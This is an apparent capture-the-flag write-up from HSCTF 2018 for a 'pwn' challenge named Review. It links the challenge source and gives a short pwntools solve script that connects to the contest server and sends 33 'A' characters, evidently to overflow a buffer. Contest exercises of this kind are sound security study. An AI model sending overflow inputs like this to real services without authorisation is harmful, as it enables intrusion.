---
title: Review
author: blevy
date: '2018-08-27'
ctfs:
  - hsctf2018
categories:
  - pwn
---

## Source

[review.c](review.c)

## Solve script

[solve.py](solve.py)

```
from pwn import *

p = remote("shell.hsctf.com", 10000)
p.recvuntil("What was the name of the last movie you watched?\n")
p.send('A' * 33)
```
